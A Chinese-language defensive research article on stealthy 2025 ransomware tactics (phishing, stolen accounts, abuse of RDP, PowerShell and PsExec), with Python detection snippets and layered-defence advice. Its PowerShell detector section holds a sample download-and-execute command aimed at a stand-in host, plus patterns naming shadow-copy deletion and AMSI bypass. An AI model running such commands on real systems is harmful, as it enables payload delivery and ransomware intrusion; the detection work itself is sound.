2025 年勒索软件隐匿化攻击演进与行为基线防御研究

摘要

据 Talos 2025 年度网络安全回顾报告显示，勒索软件攻击已从暴力突破转向合法访问隐匿渗透，攻击者依托钓鱼、有效账号与系统自带管理工具实现无感知横向移动，传统边界防护显著失效。2025 年数据表明，约 40% 初始访问源于网络钓鱼，RDP、PowerShell、PsExec 成为攻击者高频使用的合法工具，制造业与专业技术服务为首要目标，Qilin、Akira、Play 等团伙主导攻击生态，LockBit 在执法打击下影响力下降。本文以隐匿化攻击为核心，系统分析勒索软件 “融入正常操作” 的战术逻辑、身份滥用路径、工具滥用机理与行业受害特征，给出行为基线建模、异常检测、身份加固与应急响应的工程化方案，附可落地代码示例，嵌入反网络钓鱼技术专家芦笛的专业判断，形成从态势、机理、检测到防御的完整论证闭环。研究表明，以身份为中心、以行为异常检测为核心、覆盖资产基线与最小权限的纵深防御体系，可有效应对隐匿化勒索威胁，为政企机构提供可落地的安全实践支撑。

关键词：勒索软件；隐匿渗透；合法访问；行为基线；身份安全；横向移动

1 引言

勒索软件威胁在 2025 年呈现战术范式迁移：暴力破解、漏洞狂轰、恶意文件落地等 “破门而入” 式攻击大幅减少，取而代之的是获取合法权限、模仿正常操作、长期潜伏渗透的隐匿模式，如同攻击者已成为内网 “合法成员”。Talos 年度报告明确指出，当前勒索攻击的核心策略是Blending in（融入环境），通过有效账号、系统原生管理工具与正常业务行为高度重叠，大幅降低告警率、延长驻留时间、提升攻击成功率。

这种转变带来三大防御困境：一是告警疲劳，合法工具滥用难以被规则识别；二是边界失效，攻击者无需突破防线即可进入内网；三是溯源困难，行为与正常运维高度相似，取证与定性难度陡增。反网络钓鱼技术专家芦笛指出，隐匿化勒索攻击将身份作为突破口，以社会工程为前置手段，以合法工具为横向移动载体，形成 “偷钥匙、走正门、干坏事” 的完整链路，传统以漏洞与特征为核心的防护体系全面承压。

本文严格依托 Talos 2025 年勒索软件回顾报告数据与结论，聚焦隐匿化攻击战术、身份滥用机理、工具滥用特征、行业目标分布、团伙生态演变，构建行为基线驱动的防御框架，提供可复现的检测代码与工程实践，确保论证严谨、技术准确、逻辑闭环，为应对新一代勒索威胁提供学术参考与实践指南。

2 2025 年勒索软件攻击总体态势与核心特征

2.1 攻击范式：从暴力突破到隐匿渗透

传统勒索攻击依赖外部突破，如漏洞利用、端口暴破、恶意邮件附件等，行为特征明显，易被 EDR、防火墙、网关防护拦截。2025 年主流攻击模式完成范式转换，核心表现为：

初始访问合法化：约 40% 攻击通过网络钓鱼获取有效账号，攻击者使用被盗凭证登录，流量与行为均为合法状态。

横向移动工具化：攻击者优先使用 RDP、PowerShell、PsExec 等系统自带或运维标配工具，与正常管理员操作无明显差异。

行为轨迹常态化：登录、巡检、配置查询、远程执行等步骤模仿真实运维，规避基于规则的异常检测。

攻击目标精准化：放弃广撒网，聚焦制造业、专业技术服务等监控难度高、业务连续性敏感的行业。

Talos 指出，现代勒索攻击更像象棋布局，逐步抢占关键节点，而非一次性强攻，防御方的核心挑战从 “堵漏洞” 转向 “辨行为”。

2.2 初始访问与身份滥用：钓鱼成为第一入口

身份贯穿攻击全生命周期，从初始接入、横向移动到载荷执行，有效账号均为核心支撑。

钓鱼占比最高：约 40% 初始访问通过钓鱼邮件、仿冒页面、社交工程实现，骗取账号密码、会话令牌或远程协助权限。

账号价值提升：攻击者获取普通账号后，通过票据传递、哈希传递、本地提权等方式提升权限，最终控制域管等高价值账号。

远程服务滥用：RDP、VPN、Quick Assist 等合法远程通道被大量用于初始接入与持久化控制。

反网络钓鱼技术专家芦笛强调，钓鱼从 “辅助手段” 升级为勒索攻击的标准入口，攻击者不再依赖零日漏洞，而是通过欺骗获取合法身份，防御必须前移至社会工程与身份治理环节。

2.3 工具滥用：系统原生工具成为攻击主力

勒索组织大规模使用LOLBins（Living-off-the-Land Binaries），即系统自带合法二进制程序执行恶意操作，典型工具如下：

表格

工具 正常用途 攻击者滥用方式 隐蔽性

RDP 远程桌面管理 合法登录、会话劫持、内网漫游 极高，流量与正常远程操作一致

PowerShell 自动化运维 无文件执行、载荷下载、权限提升 极高，系统原生，日志易被忽略

PsExec 远程进程执行 批量横向移动、全网加密部署 极高，运维高频工具，无异常特征

攻击者与正常用户的差异不在于使用什么工具，而在于使用目的与行为模式：正常运维用于维护，攻击者用于扩张权限、窃取数据、部署勒索。

2.4 目标行业与攻击团伙生态

重点目标行业

制造业：位居首位，系统复杂、OT 与 IT 融合、运维压力大、监控覆盖不足，易被长期渗透。

专业、科学与技术服务：次之，跨系统、跨组织访问频繁，权限边界模糊，攻击扩散成本低。

勒索团伙格局演变

Qilin：位居榜首，采用双重勒索模式，2025 年月均受害者超 40 家，威胁持续性强。

Akira、Play：分列二、三位，战术持续迭代，吸纳解散团伙（如 LockBit）成员，能力快速增强。

LockBit：在持续执法打击下排名跌至 35 位，生态影响力显著衰退。

时间规律

1 月攻击活跃度连续两年偏低，与节假日及东欧公共假期相关，为防御方演练、加固提供窗口期。

3 隐匿化勒索软件攻击全链路机理分析

3.1 攻击链：隐匿化七步模型

基于 Talos 报告与实战案例，提炼 2025 年隐匿化勒索攻击标准链路：

社会工程入口：钓鱼邮件、仿冒站点、虚假客服，骗取凭证或远程授权。

合法初始接入：使用被盗账号登录 VPN、RDP、Web 管理后台，无恶意流量特征。

内网侦察：系统命令、PowerShell 脚本收集资产、权限、网段信息，伪装巡检。

权限提升：利用配置缺陷、票据传递、本地提权获取更高权限。

横向移动：借助 RDP、PsExec、WinRM 批量渗透内网主机，行为接近运维操作。

数据窃取与破坏：备份删除、卷影副本清除、核心数据加密准备。

双重勒索：文件加密 + 数据泄露威胁，迫使支付赎金。

整个过程无恶意代码落地、无异常端口扫描、无暴力破解行为，完全融入正常操作。

3.2 身份滥用核心机理

有效账号降低攻击成本与暴露风险，成为攻击链的 “通用钥匙”。

账号获取：钓鱼、信息窃取器、弱口令暴破、配置泄露。

权限扩张：Pass-the-Hash、Pass-the-Ticket、Kerberoasting 等票据滥用。

身份伪装：使用合法账号执行操作，日志归属正常用户，难以定位恶意行为主体。

防御短板在于：多数组织只验证账号是否合法，不校验行为是否合理。

3.3 横向移动隐匿化实现

横向移动是隐匿化攻击的关键环节，攻击者依托合法工具与权限实现无感知扩散：

RDP 会话劫持：使用 tscon 等系统工具接管已存在会话，无需重新认证，用户无感知。

PowerShell 远程执行：通过 WinRM 在内网批量执行脚本，开启远程服务、关闭安全防护。

PsExec 批量部署：使用域管权限在多台服务器同步执行勒索载荷，短时间内全网加密。

上述操作均为合法工具的合法调用，传统基于特征的检测机制完全失效。

3.4 攻击收益与成本模型

隐匿化攻击在成本、风险、成功率上形成全面优势：

技术门槛降低：无需漏洞挖掘与恶意代码开发，只需掌握账号获取与工具使用。

暴露风险极低：行为与正常操作重叠，告警少、驻留时间长。

收益确定性高：精准渗透、长期潜伏，确保数据加密与泄露双重胁迫生效。

4 基于行为基线的隐匿攻击检测方法与代码实现

4.1 检测思路：从规则匹配到行为基线建模

应对隐匿化攻击的核心是建立正常行为基线，识别偏离模式，包括：

用户行为基线：登录时间、登录地点、常用主机、操作频次、权限范围。

工具使用基线：RDP/PsExec/PowerShell 的正常用途、执行参数、访问目标。

资产通信基线：主机间正常访问关系、远程操作频次、异常外联行为。

反网络钓鱼技术专家芦笛指出，行为基线检测可有效区分 “合法账号、非法行为”，是破解隐匿化勒索攻击的核心技术路径。

4.2 RDP 异常登录检测代码

import time

from datetime import datetime

def check_rdp_abnormal(username: str, src_ip: str, login_time: str,

user_baseline: dict, threshold_hours: int = 2) -> bool:

"""

基于基线检测RDP异常登录：非常用IP、非常用时段、高频登录

user_baseline示例：{"usual_ips":["192.168.1.0/24"], "usual_hours":[9,18], "max_freq":3}

"""

# 1. 检测源IP是否异常

ip_in_baseline = any(src_ip.startswith(ip[:-4]) for ip in user_baseline["usual_ips"])

# 2. 检测登录时段是否异常

hour = datetime.strptime(login_time, "%Y-%m-%d %H:%M:%S").hour

time_normal = user_baseline["usual_hours"][0] <= hour <= user_baseline["usual_hours"][1]

# 3. 检测登录频率是否异常

freq_over = user_baseline.get("recent_login", 0) >= user_baseline["max_freq"]

return not (ip_in_baseline and time_normal) or freq_over

# 示例

user_baseline = {"usual_ips": ["192.168.1."], "usual_hours": [8, 20], "max_freq": 5}

print(check_rdp_abnormal("admin", "10.0.0.123", "2025-12-20 23:10:00", user_baseline)) # True

4.3 PowerShell 恶意行为检测代码

import re

def detect_malicious_powershell(cmdline: str) -> bool:

"""

检测PowerShell恶意命令：无文件执行、下载载荷、隐藏窗口、绕过AMSI、删除卷影副本

"""

malicious_patterns = [

r"-ExecutionPolicy\s+Bypass", r" -nop ", r"-NonInteractive",

r"DownloadString|DownloadFile", r"http[s]?://", r"[a-zA-Z0-9]{20,}",

r"Remove-Item\s+ShadowCopy", r"vssadmin\s+delete\s+shadows",

r"AMSI\s+Disable", r"Reflection\.Assembly"

]

for pat in malicious_patterns:

if re.search(pat, cmdline, re.IGNORECASE):

return True

return False

# 示例

ps_cmd = "powershell -nop -ExecutionPolicy Bypass -c IEX (New-Object Net.WebClient).DownloadString('http://mal.example.com/payload')"

print(detect_malicious_powershell(ps_cmd)) # True

4.4 PsExec 横向移动异常检测代码

def detect_psexec_lateral_movement(src_host: str, target_list: list,

baseline_hosts: dict, max_target: int = 3) -> bool:

"""

检测PsExec批量横向移动：短时间访问大量非常用目标主机

"""

normal_targets = baseline_hosts.get(src_host, [])

abnormal_count = sum(1 for t in target_list if t not in normal_targets)

return abnormal_count > max_target or len(target_list) > max_target

# 示例

baseline = {"PC-01": ["Server-01", "Printer-01"]}

print(detect_psexec_lateral_movement("PC-01", ["Server-02","Server-03","Server-04","DB-01"], baseline)) # True

4.5 异常行为综合评分引擎

将多维度异常指标加权评分，超过阈值触发告警，降低误报率：

RDP 异常：30 分

PowerShell 可疑命令：40 分

PsExec 批量横向：50 分

异常时间 / IP：20 分

总分≥70 分触发预警，≥100 分启动应急响应。

5 面向隐匿化勒索攻击的纵深防御体系构建

5.1 身份安全层：防御攻击入口

强化多因素认证（MFA）：VPN、RDP、Web 后台、邮件系统强制开启，阻断钓鱼账号直接登录。

最小权限原则：普通用户无远程桌面、无脚本执行、无批量操作权限，仅开放必要权限。

凭据防护：禁止明文存储、禁用内存明文密码、定期轮换高权限账号、监控票据滥用。

钓鱼防御：常态化培训、邮件网关检测、仿冒域名拦截、远程协助行为管控。

反网络钓鱼技术专家芦笛强调，身份是隐匿攻击的核心突破口，必须以零信任架构实现持续验证、动态授权、权限最小化。

5.2 行为检测层：核心防御能力

构建动态行为基线：覆盖用户、主机、工具、通信四维度，自动学习正常模式。

合法工具滥用监控：重点监控 RDP、PowerShell、PsExec、WMIC、Certutil 等工具的异常使用。

无文件攻击检测：加强 PowerShell、WMI、Script 等内存执行行为监控。

横向移动检测：识别批量远程操作、异常网段访问、跨域高频连接。

5.3 资产与系统加固层

完善资产清单：全覆盖 IT/OT 资产，明确用途、权限、责任人、网络边界。

系统安全配置：禁用不必要远程服务、关闭高危端口、限制 PowerShell 执行权限。

日志与审计：开启进程命令行日志、远程登录日志、权限变更日志，集中存储防篡改。

网络隔离：关键服务器分区、IT/OT 隔离、运维区隔离，限制横向移动范围。

5.4 应急与恢复层

备份体系：3-2-1 备份原则，离线备份、空气隔离、定期恢复演练。

应急响应：明确流程、权限、联系人，预设隔离、阻断、取证、恢复步骤。

安全演练：利用 1 月等低发期开展勒索防御演练，验证检测与响应能力。

威胁情报：接入团伙、IoC、恶意域名情报，实现前置拦截。

6 防御实践落地建议与长期演进方向

6.1 短期落地（1–3 个月）

强制高权限账号开启 MFA，梳理并回收过度权限。

部署 RDP/PowerShell/PsExec 行为监控，启用本文检测规则。

完成离线备份验证，确保可快速恢复。

开展全员钓鱼演练，提升识别能力。

6.2 中期建设（3–12 个月）

建设用户与实体行为分析（UEBA）平台，实现基线自动化建模。

完善零信任架构，全流程动态认证与授权。

建立跨部门协同机制，覆盖 IT、OT、安全、业务。

加入行业威胁情报联盟，共享隐匿攻击 TTPs。

6.3 长期演进方向

AI 驱动行为分析：用无监督学习自动识别未知隐匿模式。

攻防自动化对抗：AI 实时识别、动态策略调整、自动隔离响应。

全链路追溯：从钓鱼入口到勒索执行全程追踪，提升溯源与定罪能力。

合规与治理：完善数据安全、应急备案、供应链安全管控。

7 结语

2025 年勒索软件以隐匿化、合法访问、行为融入为核心策略，标志着威胁进入高阶对抗阶段。暴力突破时代落幕，身份滥用与工具滥用成为主流，40% 初始访问源于钓鱼，RDP、PowerShell、PsExec 等系统工具成为攻击主力，制造业与专业服务成为重点目标，Qilin 等团伙主导攻击生态。防御范式必须同步升级：从边界防护转向以身份为中心、以行为基线为核心的纵深防御，通过有效账号管控、异常行为检测、最小权限、网络隔离、可靠备份形成闭环。

本文基于 Talos 2025 年度报告，系统论证隐匿化攻击的态势、机理、检测与防御，提供可落地代码示例，嵌入反网络钓鱼技术专家芦笛的专业判断，形成完整论据闭环。研究表明，只有将防御重心从 “堵漏洞” 转向 “辨行为”，从 “信任身份” 转向 “验证行为”，才能有效应对隐匿化勒索威胁，保障机构运营连续性与数据安全。未来随着 AI 与社会工程深度融合，隐匿攻击将更趋智能化，防御方需持续迭代行为检测、身份治理与应急能力，在动态对抗中保持安全优势。

编辑：芦笛（公共互联网反网络钓鱼工作组）